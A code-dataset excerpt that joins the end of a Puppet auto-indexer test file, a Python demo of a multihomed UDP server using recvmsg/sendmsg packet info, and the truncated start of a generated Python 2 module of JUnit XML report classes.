('verbatim', 'define foo_bar::baz($paramOne,'),
('verbatim', ' $paramTwo) {'),
('verbatim', '}'),
]
class TestDefinedResourceTypeUse(AutoIndexTest):
"""Uses of defined resource types are indexed and noted:"""
send = """\
class foo {
bar_baz::bletch { "gack": }
}
"""
expect = [
('index_entry', 'class', 'foo', 'defined'),
('label', 'class_foo'),
('verbatim', 'class foo {'),
('index_entry', 'define', 'bar_baz::bletch'),
('verbatim', ' bar_baz::bletch { "gack": }'),
('margin_ref', 'define_bar_baz::bletch'),
('verbatim', '}'),
]
class TestFileUseSameLine(AutoIndexTest):
"""Mentions of files are indexed:"""
send = """\
file { "/foo/bar/baz":
...
}
"""
expect = [
('index_entry', 'file', '/foo/bar/baz'),
('verbatim', 'file { "/foo/bar/baz":'),
('verbatim', ' ...'),
('verbatim', '}'),
]
class TestFileUseDifferentLine(AutoIndexTest):
"""Some file syntaxes are not yet supported:"""
send = """\
file {
"/foo/bar/baz":
...;
"/bletch/quux/gark":
...;
}
"""
expect = [
('verbatim', 'file {'),
('verbatim', ' "/foo/bar/baz":'),
('verbatim', ' ...;'),
('verbatim', ' "/bletch/quux/gark":'),
('verbatim', ' ...;'),
('verbatim', '}'),
]
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 7,108,182,453,560,785,000 | 29.28972 | 77 | 0.543042 | false |
fishilico/shared | python/network/udp_multihome.py | 1 | 7006 | #!/usr/bin/env python3
# -*- coding:UTF-8 -*-
# Copyright (c) 2014 Nicolas Iooss
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""This program show how it is possible to run an UDP server with multihoming.
The main issue is to reply to incoming requests with the right source address,
when several ones are available. This is done by using recvmsg/sendmsg
functions instead of recvfrom/sendto which only control the remote address.
This use-case is called "multihoming".
This program has been inspired by the OpenVPN source code (src/openvpn/socket.c)
@author: Nicolas Iooss
@license: MIT
"""
import argparse
import logging
import os
import socket
import struct
import sys
logger = logging.getLogger(__name__)
# Check feature availability (need python>=3.3)
if not hasattr(socket.socket, 'recvmsg'):
raise NotImplementedError("socket.recvmsg() not found (need Python >= 3.3)")
# Define some system-specific constants
if sys.platform.startswith('linux'):
if not hasattr(socket, 'IP_PKTINFO'):
socket.IP_PKTINFO = 8
if not hasattr(socket, 'IPV6_RECVPKTINFO'):
socket.IPV6_RECVPKTINFO = 49
if not hasattr(socket, 'IPV6_PKTINFO'):
socket.IPV6_PKTINFO = 50
if not hasattr(socket, 'SO_BINDTODEVICE'):
socket.SO_BINDTODEVICE = 25
elif os.name == 'nt':
if not hasattr(socket, 'IP_RECVDSTADDR'):
socket.IP_RECVDSTADDR = 25
if not hasattr(socket, 'IPV6_RECVDSTADDR'):
socket.IPV6_RECVDSTADDR = 25
else:
raise Exception("Unsupported system")
def main(argv=None):
parser = argparse.ArgumentParser(description="Simple multihomed UDP server")
parser.add_argument('-p', '--port', type=int, default=4242,
help="UDP port to be used (default: 4242)")
parser.add_argument('-w', '--wait', action='store_true',
help="wait for connections instead of creating one")
group = parser.add_mutually_exclusive_group()
group.add_argument('-4', '--ipv4', action='store_true',
help="create an IPv4-only socket")
group.add_argument('-6', '--ipv6', action='store_true',
help="create an IPv6-only socket")
args = parser.parse_args(argv)
# Compute local variables
af = socket.AF_INET if args.ipv4 else socket.AF_INET6
localaddr = '127.0.0.1' if args.ipv4 else '::1'
anyaddr = '0.0.0.0' if args.ipv4 else '::'
port = args.port if args.port > 0 else 4242
# Create and configure socket for multihoming
skserver = socket.socket(af, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
if not args.ipv6:
if hasattr(socket, 'IP_PKTINFO'):
skserver.setsockopt(socket.SOL_IP, socket.IP_PKTINFO, 1)
elif hasattr(socket, 'IP_RECVDSTADDR'):
skserver.setsockopt(socket.IPPROTO_IP, socket.IP_RECVDSTADDR, 1)
if not args.ipv4:
if hasattr(socket, 'IPV6_RECVPKTINFO'):
skserver.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_RECVPKTINFO, 1)
elif hasattr(socket, 'IPV6_RECVDSTADDR'):
skserver.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_RECVDSTADDR, 1)
if not args.ipv4:
skserver.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, args.ipv6)
# Listen
if args.wait:
listenaddr = anyaddr
elif args.ipv6 or args.ipv4:
listenaddr = localaddr
else:
# To protect dual-stack listen, bind the socket to the loopback interface
listenaddr = anyaddr
try:
skserver.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, b'lo\0')
except PermissionError as exc:
logger.warning("Unable to bind to loopback interface: %s", exc)
ainfos = socket.getaddrinfo(listenaddr, port, af, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
skserver.bind(ainfos[0][4])
if args.wait:
logger.info("Waiting for a connection on UDP port %d.", port)
else:
# Create a client socket, which uses IPv4-in-IPv6 if enabled
clientaf = socket.AF_INET if not args.ipv6 else socket.AF_INET6
clientdstaddr = '127.0.0.1' if not args.ipv6 else '::1'
skclient = socket.socket(clientaf, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
skclient.sendto(b'Hello, world!', (clientdstaddr, port))
# Receive an incoming packet
(msg, ancdata, _, clientaddrport) = skserver.recvmsg(1024, socket.CMSG_SPACE(100))
assert args.wait or msg == b'Hello, world!' # Check the socket channel
dst_addr = None
ifindex = None
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if cmsg_level == socket.SOL_IP and hasattr(socket, 'IP_PKTINFO') and cmsg_type == socket.IP_PKTINFO:
# struct in_pktinfo { int ipi_ifindex; struct in_addr ipi_spec_dst, ipi_addr; };
assert len(cmsg_data) == 12
dst_addr = socket.inet_ntop(socket.AF_INET, cmsg_data[4:8])
ifindex = struct.unpack('I', cmsg_data[:4])[0]
elif cmsg_level == socket.IPPROTO_IPV6 and hasattr(socket, 'IPV6_PKTINFO') and cmsg_type == socket.IPV6_PKTINFO:
# struct in6_pktinfo { struct in6_addr ipi6_addr; int ipi_ifindex; };
assert len(cmsg_data) == 20
dst_addr = socket.inet_ntop(socket.AF_INET6, cmsg_data[:16])
ifindex = struct.unpack('I', cmsg_data[16:20])[0]
else:
logger.warning("Unknown anciliary data: %s, %s, %r", cmsg_level, cmsg_type, cmsg_data)
# TODO: decode IP_RECVDSTADDR/IPV6_RECVDSTADDR
text = "Received UDP packet from {0[0]} port {0[1]}".format(clientaddrport)
if dst_addr is not None:
text += " to {} port {} interface {}".format(dst_addr, port, ifindex)
logger.info(text)
# Send back a reply with the same ancillary data
skserver.sendmsg([b'Bye!\n'], ancdata, 0, clientaddrport)
skserver.close()
if not args.wait:
skclient.close()
return 0
if __name__ == '__main__':
logging.basicConfig(format='[%(levelname)s] %(message)s', level=logging.DEBUG)
sys.exit(main())
| mit | -7,359,975,875,040,569,000 | 42.246914 | 120 | 0.672566 | false |
ColinIanKing/autotest | client/tools/JUnit_api.py | 1 | 63896 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Thu Dec 1 09:58:36 2011 by generateDS.py version 2.7a.
#
import sys
import getopt
import re as re_
etree_ = None
Verbose_import_ = False
( XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
# cElementTree from Python 2.5+
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
# ElementTree from Python 2.5+
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
# normal ElementTree install
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError("Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
if (XMLParser_import_library == XMLParser_import_lxml and
'parser' not in kwargs):
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
kwargs['parser'] = etree_.ETCompatXMLParser()
doc = etree_.parse(*args, **kwargs)
return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return '%f' % input_data
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(node, 'Requires sequence of booleans ("true", "1", "false", "0")')
return input_data
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'ascii'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(outfile, level):
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if XMLParser_import_library == XMLParser_import_lxml:
msg = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
else:
msg = '%s (element %s)' % (msg, node.tag, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(outfile, level, namespace,name)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (self.name, self.value, self.name))
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' % \
(self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' % \
(self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s",\n' % \
(self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class testsuites(GeneratedsSuper):
"""Contains an aggregation of testsuite results"""
subclass = None
superclass = None
def __init__(self, testsuite=None):
if testsuite is None:
self.testsuite = []
else:
self.testsuite = testsuite
def factory(*args_, **kwargs_):
if testsuites.subclass:
return testsuites.subclass(*args_, **kwargs_)
else:
return testsuites(*args_, **kwargs_)
factory = staticmethod(factory)
def get_testsuite(self): return self.testsuite
def set_testsuite(self, testsuite): self.testsuite = testsuite
def add_testsuite(self, value): self.testsuite.append(value)
def insert_testsuite(self, index, value): self.testsuite[index] = value
def export(self, outfile, level, namespace_='', name_='testsuites', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='testsuites')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='testsuites'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='testsuites', fromsubclass_=False):
for testsuite_ in self.testsuite:
testsuite_.export(outfile, level, namespace_, name_='testsuite')
def hasContent_(self):
if (
self.testsuite
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='testsuites'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('testsuite=[\n')
level += 1
for testsuite_ in self.testsuite:
showIndent(outfile, level)
outfile.write('model_.testsuiteType(\n')
testsuite_.exportLiteral(outfile, level, name_='testsuiteType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'testsuite':
obj_ = testsuiteType.factory()
obj_.build(child_)
self.testsuite.append(obj_)
# end class testsuites
class testsuite(GeneratedsSuper):
"""Contains the results of exexuting a testsuiteFull class name of the
test for non-aggregated testsuite documents. Class name without
the package for aggregated testsuites documentswhen the test was
executed. Timezone may not be specified.Host on which the tests
were executed. 'localhost' should be used if the hostname cannot
be determined.The total number of tests in the suiteThe total
number of tests in the suite that failed. A failure is a test
which the code has explicitly failed by using the mechanisms for
that purpose. e.g., via an assertEqualsThe total number of tests
in the suite that errorrd. An errored test is one that had an
unanticipated problem. e.g., an unchecked throwable; or a
problem with the implementation of the test.Time taken (in
seconds) to execute the tests in the suite"""
subclass = None
superclass = None
def __init__(self, tests=None, errors=None, name=None, timestamp=None, hostname=None, time=None, failures=None, properties=None, testcase=None, system_out=None, system_err=None, extensiontype_=None):
self.tests = _cast(int, tests)
self.errors = _cast(int, errors)
self.name = _cast(None, name)
self.timestamp = _cast(None, timestamp)
self.hostname = _cast(None, hostname)
self.time = _cast(float, time)
self.failures = _cast(int, failures)
self.properties = properties
if testcase is None:
self.testcase = []
else:
self.testcase = testcase
self.system_out = system_out
self.system_err = system_err
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if testsuite.subclass:
return testsuite.subclass(*args_, **kwargs_)
else:
return testsuite(*args_, **kwargs_)
factory = staticmethod(factory)
def get_properties(self): return self.properties
def set_properties(self, properties): self.properties = properties
def get_testcase(self): return self.testcase
def set_testcase(self, testcase): self.testcase = testcase
def add_testcase(self, value): self.testcase.append(value)
def insert_testcase(self, index, value): self.testcase[index] = value
def get_system_out(self): return self.system_out
def set_system_out(self, system_out): self.system_out = system_out
def get_system_err(self): return self.system_err
def set_system_err(self, system_err): self.system_err = system_err
def get_tests(self): return self.tests
def set_tests(self, tests): self.tests = tests
def get_errors(self): return self.errors
def set_errors(self, errors): self.errors = errors
def get_name(self): return self.name
def set_name(self, name): self.name = name
def get_timestamp(self): return self.timestamp
def set_timestamp(self, timestamp): self.timestamp = timestamp
def validate_ISO8601_DATETIME_PATTERN(self, value):
# Validate type ISO8601_DATETIME_PATTERN, a restriction on xs:dateTime.
pass
def get_hostname(self): return self.hostname
def set_hostname(self, hostname): self.hostname = hostname
def get_time(self): return self.time
def set_time(self, time): self.time = time
def get_failures(self): return self.failures
def set_failures(self, failures): self.failures = failures
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def export(self, outfile, level, namespace_='', name_='testsuite', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='testsuite')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='testsuite'):
if self.tests is not None and 'tests' not in already_processed:
already_processed.append('tests')
outfile.write(' tests="%s"' % self.gds_format_integer(self.tests, input_name='tests'))
if self.errors is not None and 'errors' not in already_processed:
already_processed.append('errors')
outfile.write(' errors="%s"' % self.gds_format_integer(self.errors, input_name='errors'))
if self.name is not None and 'name' not in already_processed:
already_processed.append('name')
outfile.write(' name=%s' % (self.gds_format_string(quote_attrib(self.name).encode(ExternalEncoding), input_name='name'), ))
if self.timestamp is not None and 'timestamp' not in already_processed:
already_processed.append('timestamp')
outfile.write(' timestamp=%s' % (quote_attrib(self.timestamp), ))
if self.hostname is not None and 'hostname' not in already_processed:
already_processed.append('hostname')
outfile.write(' hostname=%s' % (self.gds_format_string(quote_attrib(self.hostname).encode(ExternalEncoding), input_name='hostname'), ))
if self.time is not None and 'time' not in already_processed:
already_processed.append('time')
outfile.write(' time="%s"' % self.gds_format_float(self.time, input_name='time'))
if self.failures is not None and 'failures' not in already_processed:
already_processed.append('failures')
outfile.write(' failures="%s"' % self.gds_format_integer(self.failures, input_name='failures'))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.append('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespace_='', name_='testsuite', fromsubclass_=False):
if self.properties is not None:
self.properties.export(outfile, level, namespace_, name_='properties', )
for testcase_ in self.testcase:
testcase_.export(outfile, level, namespace_, name_='testcase')
if self.system_out is not None:
showIndent(outfile, level)
outfile.write('<%ssystem-out>%s</%ssystem-out>\n' % (namespace_, self.gds_format_string(quote_xml(self.system_out).encode(ExternalEncoding), input_name='system-out'), namespace_))
if self.system_err is not None:
showIndent(outfile, level)
outfile.write('<%ssystem-err>%s</%ssystem-err>\n' % (namespace_, self.gds_format_string(quote_xml(self.system_err).encode(ExternalEncoding), input_name='system-err'), namespace_))
def hasContent_(self):
if (
self.properties is not None or
self.testcase or
self.system_out is not None or
self.system_err is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='testsuite'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.tests is not None and 'tests' not in already_processed:
already_processed.append('tests')
showIndent(outfile, level)
outfile.write('tests = %d,\n' % (self.tests,))
if self.errors is not None and 'errors' not in already_processed:
already_processed.append('errors')
showIndent(outfile, level)
outfile.write('errors = %d,\n' % (self.errors,))
if self.name is not None and 'name' not in already_processed:
already_processed.append('name')
showIndent(outfile, level)
outfile.write('name = "%s",\n' % (self.name,))
if self.timestamp is not None and 'timestamp' not in already_processed:
already_processed.append('timestamp')
showIndent(outfile, level)
outfile.write('timestamp = "%s",\n' % (self.timestamp,))
if self.hostname is not None and 'hostname' not in already_processed:
already_processed.append('hostname')
showIndent(outfile, level)
outfile.write('hostname = "%s",\n' % (self.hostname,))
if self.time is not None and 'time' not in already_processed:
already_processed.append('time')
showIndent(outfile, level)
outfile.write('time = %f,\n' % (self.time,))
if self.failures is not None and 'failures' not in already_processed:
already_processed.append('failures')
showIndent(outfile, level)
outfile.write('failures = %d,\n' % (self.failures,))
def exportLiteralChildren(self, outfile, level, name_):
if self.properties is not None:
showIndent(outfile, level)
outfile.write('properties=model_.propertiesType(\n')
self.properties.exportLiteral(outfile, level, name_='properties')
showIndent(outfile, level)
outfile.write('),\n')
showIndent(outfile, level)
outfile.write('testcase=[\n')
level += 1
for testcase_ in self.testcase:
showIndent(outfile, level)
outfile.write('model_.testcaseType(\n')
testcase_.exportLiteral(outfile, level, name_='testcaseType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
if self.system_out is not None:
showIndent(outfile, level)
outfile.write('system_out=%s,\n' % quote_python(self.system_out).encode(ExternalEncoding))
if self.system_err is not None:
showIndent(outfile, level)
outfile.write('system_err=%s,\n' % quote_python(self.system_err).encode(ExternalEncoding))
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('tests', node)
if value is not None and 'tests' not in already_processed:
already_processed.append('tests')
try:
self.tests = int(value)
except ValueError, exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
value = find_attr_value_('errors', node)
if value is not None and 'errors' not in already_processed:
already_processed.append('errors')
try:
self.errors = int(value)
except ValueError, exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
value = find_attr_value_('name', node)
if value is not None and 'name' not in already_processed:
already_processed.append('name')
self.name = value
self.name = ' '.join(self.name.split())
value = find_attr_value_('timestamp', node)
if value is not None and 'timestamp' not in already_processed:
already_processed.append('timestamp')
self.timestamp = value
self.validate_ISO8601_DATETIME_PATTERN(self.timestamp) # validate type ISO8601_DATETIME_PATTERN
value = find_attr_value_('hostname', node)
if value is not None and 'hostname' not in already_processed:
already_processed.append('hostname')
self.hostname = value
self.hostname = ' '.join(self.hostname.split())
value = find_attr_value_('time', node)
if value is not None and 'time' not in already_processed:
already_processed.append('time')
try:
self.time = float(value)
except ValueError, exp:
raise ValueError('Bad float/double attribute (time): %s' % exp)
value = find_attr_value_('failures', node)
if value is not None and 'failures' not in already_processed:
already_processed.append('failures')
try:
self.failures = int(value)
except ValueError, exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
value = find_attr_value_('xsi:type', node)
if value is not None and 'xsi:type' not in already_processed:
already_processed.append('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'properties':
obj_ = propertiesType.factory()
obj_.build(child_)
self.set_properties(obj_)
elif nodeName_ == 'testcase':
obj_ = testcaseType.factory()
obj_.build(child_)
self.testcase.append(obj_)
elif nodeName_ == 'system-out':
system_out_ = child_.text
system_out_ = self.gds_validate_string(system_out_, node, 'system_out')
self.system_out = system_out_
elif nodeName_ == 'system-err':
system_err_ = child_.text
system_err_ = self.gds_validate_string(system_err_, node, 'system_err')
self.system_err = system_err_
# end class testsuite
class system_out(GeneratedsSuper):
"""Data that was written to standard out while the test was executed"""
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if system_out.subclass:
return system_out.subclass(*args_, **kwargs_)
else:
return system_out(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='system-out', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='system-out')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='system-out'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='system-out', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='system-out'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
